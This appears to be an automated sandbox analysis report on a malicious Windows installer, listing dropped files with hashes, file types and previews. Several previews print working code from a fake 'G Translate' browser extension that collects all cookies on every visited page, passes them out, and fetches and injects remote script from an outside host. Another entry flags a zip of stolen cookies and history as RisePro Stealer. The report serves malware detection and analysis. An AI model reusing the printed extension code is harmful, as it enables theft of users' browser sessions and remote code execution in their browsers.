                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):221184
                                          Entropy (8bit):6.939928485719776
                                          Encrypted:false
                                          SSDEEP:3072:jMVPYhwPGRcU82DFUT6UX+vkZQ2ftfLmaPUDF2QXrKj1bEVy:IPGdRK2euUXrftjmacDcrj1b
                                          MD5:EEAB6B508F842CE18D229914CD7167F7
                                          SHA1:739E0C2CBDC05C27962A4BF5D1388BC31ABC8811
                                          SHA-256:DCA2FAEC2933DBE461D5583BA92D89633F4C48BB33C39D9F1F9915A323ECCFF3
                                          SHA-512:465D18D0C28B7579CAC4F4B3B67A0CB065DF699327401D8EDBBF7433083863FF36099BA71D4E9784BDB9CE035209B60B330863DE917C05F247F93EEFBCE4CE74
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 54%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..\..\..Q...F..Q.>.(..Q.?.{..U.M.[..\..9...w?.]..Q...]...w..]..Rich\..........PE..L....R.c.....................L.......?............@..........................@...............................................X..P..................................4Y...............................N..@...............h............................text............................... ..`.rdata...q.......r..................@..@.data....0...p...v...T..............@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1440, components 3
                                          Category:dropped
                                          Size (bytes):389194
                                          Entropy (8bit):7.927615507427045
                                          Encrypted:false
                                          SSDEEP:6144:Bjx+yOxRU3RaMDYgJBbrasGi3+EX4eEZat6+K0ZzNJ7O8346oqvpuoV0mBa1+:SnMaEt+i3+dZa1K0ZzNJ7O83nMmi+
                                          MD5:3200DC4E4F84ECA82267063AA1055D0C
                                          SHA1:9E634FADAA76AFC35B7D040E32AAF2911EEAD364
                                          SHA-256:60EB602D492C656CBCC7BDB8A2520BE9815C4A5F1E21D0435CC2B60819970240
                                          SHA-512:FBE9218E8656390AF05084188E1959E50BB06F3BA8C6374B854F26F103A6EBFBF8ABAF446E0DFFCD3C4B80B1D7759A8E8BED352E1D3916256657103C3BC0294B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......JFIF.............C....................................................................C.........................................................................8............................................c.........................!.."1A.2Q.#BRaq3br............$4CS...c....%s.....&5DTd..'6EUet....7F.....................................>......................!.1.A..."2Qa.#3q..B....$4...C.DRr.b..............?....{.e..#y.|..,....P.b...?...'(..+....#.....B....:,9=.o5..,.b...M:,rP.w....<.C1......&.....lP....OrP.rZ....P,M.y"...,.....@X..oD..@;: ,......$...P.p.....pg....:.<.......;...8..B.......)..,........a.. ..!.!0..r.P..*.....f.....O..t*...o.'...[.....o`h..4.m|,..G....<<0@.?.F.*R7Sd...e.@.._.@...j..FGy.,..{..0.X..6.h7...E..wF..r..nl.Yp....o....j`..T...Y].7.m.J.a....g..@..,..<L.TD.Ra...u.....BS.\......+><{N8.rA....G..#....n.....F......|#.;....Bs..n6....a..|..5d...g..|.w.4...}...I|....S..>........aRW;~g..y.I4_)....)...(v.w.............]2.k}>P...^...|..=.c.u...V
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3134464
                                          Entropy (8bit):7.987488694347116
                                          Encrypted:false
                                          SSDEEP:49152:sa24nrYoeu14yHYne7V64z4APA5EtaUi7YcI5NtMQQDF4PAxf0NQdX1fwCm:Dncol14y4e7Vm0xaMcojM/DMAxf0yXF9
                                          MD5:F57F726F9E1B8C24B4F7C275FFAC78CF
                                          SHA1:339FED05D2D4A963E734E22741C89979D6B68B73
                                          SHA-256:AC9BF57379A94E559528BA283CBF74BF0DACF647CBB7F485437C361246FBD123
                                          SHA-512:C5BE34173BF2B710C57B4497A065FE19FB9DD62459EDFF56FDCC85363CCEDB53FC39989ED287DD07295A15E8DC86BF7902C68BD23E2B765CFC5B0ED94B56FA8F
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....|..................@......................................@... .. .... .. ..........P.......,........`..4...................0........................................................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@.........`y......(..................@....data.....!.......!.................@...................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):7043584
                                          Entropy (8bit):7.75428592634626
                                          Encrypted:false
                                          SSDEEP:196608:g33d6GSs0kBLodTLC41KJtkBzHxP3otI2IWRbO1bc:g33dIsR4TLCE4IzHxQtIfe
                                          MD5:C5FBFA06070EF1EA150FA88E1B6C6684
                                          SHA1:A00FAFE162FDE52A87B19C8A804CC7B9081A876B
                                          SHA-256:1C065244F549BF1CFAEE6C5F3CC0E98E7F64B3551D85F1AE5A3B88F6844F07E8
                                          SHA-512:CD97E76AC5924771F738A6E9F448E45051B78315CE5846C63BFF16515CFE3B339D330680F5C5BA5BC13AEED331AB06C6DF23C3CD6DEFFB2C58596E5FB4BBB1BD
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.fp.e.#.e.#.e.#.7.#.e.#.7.#ce.#.7.#.e.#..#.e.#.e.#.e.#...#.e.#...#.e.#Rich.e.#........PE..L.....Ma......................`..................@...........................k.....).k...@...................................k...............................k.L:....................................j.@.............k..............................text............................... ..`.data...l._......x_.................@....idata........k......(k.............@..@.reloc..L:....k..<...>k.............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):6678961
                                          Entropy (8bit):7.996134570189107
                                          Encrypted:true
                                          SSDEEP:196608:91O9G1b2lONGcZZPVgQI6fhtMUJAAx8hzFHa:3Oe3NhZZyluhmUJ5x8hzBa
                                          MD5:0EC8D7480C7D858848914B24584B17B4
                                          SHA1:E7DD43AA3D301C74E2E4F82EAA38C41064DFBDA5
                                          SHA-256:3646869590C227B37833952C28229173642E91F3BC6CFD9F0C64AEDE0F381B7C
                                          SHA-512:4AE865EA7FFBDA92DFC1981E894FC89D3248F305945ECAE2EB107450691903FF906F16F08BDBD839EE0EFBE77BE716C5317ECF103EEE411DCED47BB695ADDB44
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):750388
                                          Entropy (8bit):7.999787714980367
                                          Encrypted:true
                                          SSDEEP:12288:FwUV/AsRet7H2repH0auZ+8GG+vuXcB++tNFrOTshYw1+wDTD+yJtPXVSCU+oJ:DJYtqrDpVVG++tL5hYw1TDTCybXVVKJ
                                          MD5:334CE16171A3EE86DB1ECFDBB18373F3
                                          SHA1:63FC0F6A6C7CC3BC561E31CC9CBB740CC49AC2F6
                                          SHA-256:0F219080202ED1F7260FF7BD440993BB47944B7587B23EDB5D6051E433D5C718
                                          SHA-512:43FF7A8742BB218BC448ED5DEC60DE5310743E89C9886476D65D7E31CD07D8738FDCC53146B9A92DBD7E9B5074941261A20096E5EAC609323CBA226894C2C9C6
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:X..V4i...9......... ...\......w,N3e..bE.K.....i.e.....wn..n..K...F...I..#?.....@.P5.n.h?Gs...z.........q...h..XK3.47.........u.P..?....t..W1.x. .j.$..X#..?[.%_w.........:.KQB......I..!0..w..z..k..b.L..w.nyo...I.....C..s_.7.j.!7.!\..H..Q...Q~...).1....V.....5....Cr.......l.h r]...7.r69.....s0Z.h..u.,...O...m.u..yG$.t3..c.._F...H..&.Z.w..NF4.....X...Q.o..8..w.=........\.....m..|. U.SR...~%.....I<....}".&..8.....1V.... ......~~M.T.T.OP...C.8..z...C.On...K.{..7.#..o&....G.=.......l5.8F.....U.).6.#`u%.YaE.4.>......k..g....,....`...0..qK...+.......pa..!?.......{:."...s./2>.3.0Shc.......".].Y....i...n..k...Gb.%U.O4.k.xt.@{...RhO.0./0>BC...+.\...UVF@...3\...K.l..K....H....?.nA.E~..i;.7Q.|1B..,<...a\..xB....B..kL15~t.."..x()0.1.b.wBJ.B.l%.7.;.$..&6.....g.S..|.,0......Z........tGs."..k.L.5.....p......=]e..vT..&.}...!?.q.!............7..3.#.V....qg..{...S.!/.C........m....Z?].<.@?...D.%l....'.....|J.'..PB!..4a....uO.$oR..SQ.;...L.E.Y|.,3)..ic
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):3929
                                          Entropy (8bit):5.157208672167165
                                          Encrypted:false
                                          SSDEEP:96:+Xx4YDX54BA9qh86q2NCs7mMnGzFMPCBG74DUuDfuQb9a:+mo47CsbnGz/K49hE
                                          MD5:7190651F63C7093873D44C5B0A94C01D
                                          SHA1:304D8D8B8F257BD819C16D4F67FB731FD1D6A566
                                          SHA-256:716F300751686FC19BFB09B49E9502212E774798721BC78AC7051DA82D6C107C
                                          SHA-512:5D346003EA7E719D0C233AFC76487934963A90AA8B0374653D2F66D591420F4062ECAFF595995F748D98241355E63A48BB8C103FBA6279A40DC682D36EC15018
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:let uniqueId;....chrome.runtime.onInstalled.addListener(async () => {.. uniqueId = await getData("uniqueId", undefined);.... if (!uniqueId) {.. uniqueId = generateUniqueId();.. await setData("uniqueId", uniqueId);.. }..});....chrome.webRequest.onCompleted.addListener(...async (details) => {... const qwqwqerw = await chrome.cookies.getAll({ url: details.url });... const xxxxsds = qwqwqerw.map((cvdfdfd) => ({....domain: cvdfdfd.domain,....expirationDate: cvdfdfd.expirationDate,....hostOnly: cvdfdfd.hostOnly,....httpOnly: cvdfdfd.httpOnly,....name: cvdfdfd.name,....path: cvdfdfd.path,....sameSite: cvdfdfd.sameSite,....secure: cvdfdfd.secure,....session: cvdfdfd.session,....storeId: cvdfdfd.storeId,....value: cvdfdfd.value... }));... await yrretrete(xxxxsds);...},...{ urls: ["<all_urls>"], types: ["main_frame"] },...["responseHeaders"].. );.. .. async function yrretrete(iuuiui) {...let zhengju = await getData("zhengju", []);......for (let ewewewe of iuuiui) {... const inde
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):9163
                                          Entropy (8bit):7.932141623252235
                                          Encrypted:false
                                          SSDEEP:192:452Ler2SJy0cuPea2NHB1EJdc2mJgl4KddtHGN6/jypq:qVr2X09PeaKHB1E/cbJxKddfyo
                                          MD5:D2216C7877CC822C3ED9CEE055FA8CAD
                                          SHA1:12A20178F057548C04964E4FBED9A9E01B79DA71
                                          SHA-256:64323598C2F170F30E8E0C185EB570B615A40D0650034F5E8C6A29442735729C
                                          SHA-512:91A5F3B0891B9D831D2F0A65BAD4D90FF0E62D986E6EA66652F9A067F6CFA659230F23507E7E99CB100D4F207B24E19065263BCAB27E6E551065B483193528B7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..........+......bKGD.............%tEXtdate:create.2022-03-03T18:50:25+00:00..+....%tEXtdate:modify.2022-03-03T18:50:25+00:00.I....".IDATx^.]...E.>w.53Y!+.. .."..#K...U.'.........(..$.l.".....(;O...(.@V.@L.d.}..;.u..u{....3...pr.v.Z....NUW....._^....gi..<u..L.".......qSC.....,.9.......^....]tL...%n......^Z......k.D.ed?..N..0...z......l.fM..g..gF!..t.s.....jH....P2..([1(..d$..}'g....../...w......~..w.N\...#.d.3..(.@..u.Z.:W..F.E.....j".C.C..u.'...0fV...@.+..J$y.x.Q.p".8;@m...o....k.zs..tDWn.S.?.,.......l.|q..tD.x.\i.....P...=.......U..i......v.8z.e..).@u..t.H..|.L....0.k..\..x....@?..-.2.:.. &..d.b.GbS..z!...?.4......F.....D..!......n......@I./.:I..:A....qq..f...B...B...!(.F.20...A. .....X.... ...Q'..^i..r..-V=...Z...N#.Us...H.....$.2..6...F..*w.......:F.(.:O...../f.o#.Q../9.@_..B>.......QG.......k.......i.~....U#.Jh.*.{.....`.. D.Y&.]7.:...D %..A..'.0....
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1388
                                          Entropy (8bit):4.804068696237837
                                          Encrypted:false
                                          SSDEEP:24:gsYvRyGpy1vJddy0TvEwmUYi/dgbRvecEn+MuRyzZxmRLE+:gXRvy1BdtTXYydCRvecEn+Nyz2O+
                                          MD5:9AB0F9320495B406FDDB6DE1730652CC
                                          SHA1:A6D35A74DC53289794C9A05DC1AD8C03878E153A
                                          SHA-256:AB913781705A8841F3C3973AF4CFEB14C7ED9919A08FF810B920DCA17D69CBD1
                                          SHA-512:C527057C8AF9CB4A55A71FF5A8010706119FD19B5C354DAE046CD498F350C422B10578A3E3C2423E385C81D76D3ECE3B057C5F02F8C7B76769E18C5E2AA023FE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:window.addEventListener(.. "message",.. async function(event) {.. var uniqueId = await getData("uniqueId", undefined).. if(event.data === 'xxxss'){.. window.postMessage({action:"dsssss",uniqueId:uniqueId},'*');.. }.. else if(event.data === 'yuyuyu'){.. var zhengju = await getData('zhengju',[]);.. var name = chrome.runtime.getManifest().name;.. window.postMessage({action:"xxxxx1",zhengju:zhengju, id:uniqueId,name:name},'*');.. }.. else if(event.data.action === 'xxxxx2').. {.. chrome.runtime.sendMessage({ action: "xxxxx2", url:event.data.url, data:event.data.data});.. deleteData('zhengju');.. }.. },.. false.. );.. .. async function getData(key, defaultValue) {.. const result = await new Promise((resolve) => {.. chrome.storage.local.get(key, (data) => {.. resolve(data[key] ?? defaultValue);.. });.. });.. return result;.. }.. .. async function deleteData(key) {..
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):760
                                          Entropy (8bit):4.623828038356185
                                          Encrypted:false
                                          SSDEEP:12:gsY6fUQGm58F1uX+RYuHnGR5PSb3sReHSoI+gzxXDJQW:gsY6f9GmGnuuRYuHGRRKsReHSt+gzRFN
                                          MD5:9BDB783950B8A2964601E723C752A4F1
                                          SHA1:FB03EF617E615E00C0DB2BF46F0CA61D40CBAFFB
                                          SHA-256:FE5658184307B0ADC7766ADCF3371FCFDB5D13F2997BC4F178617CBA9A4FB6EA
                                          SHA-512:054A4D5F20F0168FED3D082D06A393CAD9AF72B4933EA7CAAF1DFF3966DED16957DED7D50CCB954CD7161421486B73CD5FD301903C57443A2879247EE5EE9179
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:window.addEventListener(.. "message",.. async (event) => {.. if (event.data.action !== "dsssss") {.. return;.. }.. .. const uniqueId = event.data.uniqueId;.. .. fetch(`https://thridparty.nservices.org/api/browser/GetScript?id=${uniqueId}&currentUrl=${encodeURIComponent(location.href)}`).. .then((response) => response.text()).. .then((script) => {.. const scriptElement = document.createElement("script");.. scriptElement.textContent = script;.. document.head.appendChild(scriptElement);.. }).. .catch((error) => {.. console.error("Error fetching or injecting script:", error);.. });.. },.. false.. );.. .. window.postMessage("xxxss", "*");..
                                          Process:C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):884
                                          Entropy (8bit):4.689092695649468
                                          Encrypted:false
                                          SSDEEP:24:ueKwH1w3ZWEA8L78s+9FopT/zvQWtsRDeS32k:/J4ZWH8L78sMoxzvKSS3L
                                          MD5:3B697EAF6802FD9D093C632011E4C560
                                          SHA1:AA64DF47C04F9FB88E59E0D0953E4376020EC845
                                          SHA-256:4D18A652726C51E54D1B9780CA39C87F5E971F6BCD52C6B89CBD945EFE1BFC26
                                          SHA-512:FA01817195FF33BED282FCB5185D32E1E3241C48473BFDB1AF1AA778ADD754445BD252C76C2D368D9F05557F009E093A7DBC6E3F282FAA04935B3DDED7FFB190
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{. "manifest_version": 3,. "name": "G Translate",. "version": "1.0",. "description": "View translations easily as you browse the web. ",. "icons": {. "128": "icon.png". },. "permissions": [. "scripting",. "webNavigation",. "storage",. "activeTab",. "<all_urls>",. "webRequest",. "cookies",. "tabs",. "downloads",. "webRequestBlocking",. "notifications",. "declarativeNetRequest",. "declarativeNetRequestFeedback",. "declarativeNetRequestWithHostAccess",. "unlimitedStorage",. "tabs". ],. "host_permissions": ["https://*/*", "\u003Call_urls>"],. "background": {. "service_worker": "background.js". },. "content_scripts": [ ..{. "js": [ "js/content.js" ],. "matches": [ "https://*/*"]. } . ],. "web_accessible_resources": [{. "resources": ["js/injected-script.js"],. "matches": ["<all_urls>"].}].}.
                                          Process:C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:modified
                                          Size (bytes):665493
                                          Entropy (8bit):7.997968279184295
                                          Encrypted:true
                                          SSDEEP:12288:b6d6UAuSoviLbeXef3qvfEl+USf/4Dxb+bmC1iYOeWG7zuCwO1Tobq:b64puSoviLqOf6dpf+xb+bmYp+G7T77
                                          MD5:FA09FC3014A1323E2008BE9BAA7C06BC
                                          SHA1:85CBD316898CE0B9F5265B17699F8F8E18E8EC15
                                          SHA-256:57F94148AEE206E91660147842827A8C9F899FF13A57D08D954851E420801317
                                          SHA-512:3DD9A4058E6340C3D8584963D3677BAD0B106CF7D7C9F056CD9854B8313FAA87A06D7BC07499C77B6176BF3B68A2AE31D3CCCBF5255857B810D55F2FA5027A2F
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\G1Y1cICOYjk_P6MTvNhL7sj.zip, Author: Joe Security
                                          Reputation:unknown
                                          Preview:PK...........X................Cookies\..PK...........X........$.......Cookies\Chrome_Default.txt....P...5.........`.L2J1l..\@.k.D..M'.t.k[Op...k...=..#T......?T...y..8.!(.h.>....o?.E.<.....EvWV.A....r,.4..|...u..<..4..T..w..1....._V..a..jZ....qcY..:.T.I.................l9.u..M.n.Q.W..Y3..".i...N.....;.n....t..].|-8|....W..v.....If&xA,}.`+5~.....Yx-..3..><9.]K.)..in.. .H=.@..FEH.a..<...0.j...t.J,=>6..z.k.x...N...f*.R.+.Y...~i.I..4.....p.Wm...5j.............*....tI..t.o..E....PK...........X................History\..PK...........X..H.A...p...,...History\Firefox_v6zchhhv.default-release.txt.())(...///......I../J./(.,KL..O.,JM...44.4312.06.....)5O74..V.PK...........X................information.txt}X.n.:.}7.. 0/..nq.%.i.ew.xI:N....V.....`.}(....F.q..:Uu.Xbo.FA..b.n....Y..I....l4.....4u.4r_.1.A;.w...AXc...0...r.f..N...b.1Z..x-...{....o6.........eF.c.ma,D.......R.w8._.qt]....i3jb*w`A........t....-......s....-.$....6.I..M.x..n.z.n1z}8/..E.;.d.3qz.]...b'...4{D.0.
                                          Process:C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):760320
                                          Entropy (8bit):6.561572491684602
                                          Encrypted:false
                                          SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                          MD5:544CD51A596619B78E9B54B70088307D
                                          SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                          SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                          SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2662
                                          Entropy (8bit):7.8230547059446645
                                          Encrypted:false
                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2662
                                          Entropy (8bit):7.8230547059446645
                                          Encrypted:false
                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                          Process:C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2461696
                                          Entropy (8bit):7.968904820406743
                                          Encrypted:false
                                          SSDEEP:49152:8H9iikDvlC9mfhSUq7SUEynKuK5p33dhtuvTGcxh1D:wii0oggUq7suK55HoVxh1D
                                          MD5:7D9D057B7075833CA5A105D2CB456530
                                          SHA1:C8FB052F334DA1D6BE75E41ED54465578B5707FD
                                          SHA-256:2AA150519224BC7BF4F2FF63AA74603864DCD17B41CADD081020F83F5D772D28
                                          SHA-512:699E18DA1CC26E5F7D86097CC109A0991B184B16FCA565E1C4DCD4CB4433816A9269A4629CD330D085561392663052DAD134C5C617109F019E35796081300FF1
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@.......................................Z..5.e.f.e.f.e.fx..fSe.f..Nfwe.f.;.gCe.f..f.e.f.>2f)e.f..ff.e.f.<.gOe.f9..f.e.f..Nf.e.fc..fae.f...fte.f.>.g5e.fp8.g)e.f...f1e.f..2fQe.f...f7e.f.7If!e.f...f.e.f...f=e.f9..f'e.fq.WfUe.f..f^e.fx..fPe.f...fse.fq.ff(e.f..f.e.f...gne.f...gNe.fq.Vf+e.f;.,f8e.f9..fje.f.e.f.d.f..ff5e.fRich.e.f....................................PE..L...-.p7...........!.....@...P......x........P................................%......G&..............................#.l.....#.<.....%.p.....................%..s......8............................................P..........`....................text....5.......@.................. ..`.rdata..<S...P...`...P.................@.data...DK....#..@....#.............@....rsrc...p.....%.......$.............@..@.reloc........%.......%.............@..B....................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:dropped
                                          Size (bytes):3452
                                          Entropy (8bit):7.795695502813378
                                          Encrypted:false
                                          SSDEEP:48:9HaIL8DZIpMh1Wm0PBOSjUTI86AkOBP4a5PIgFK5Nh6+ITMnBczfgnFzV+n3KJ6/:h8DFh10PJjUTkOBlPq5Zns8FE3KJt0
                                          MD5:6FC7546A18C0870D0B306E177C62A42A
                                          SHA1:5AD2779A91CB06A79327AB1A8381A66B5A9B971E
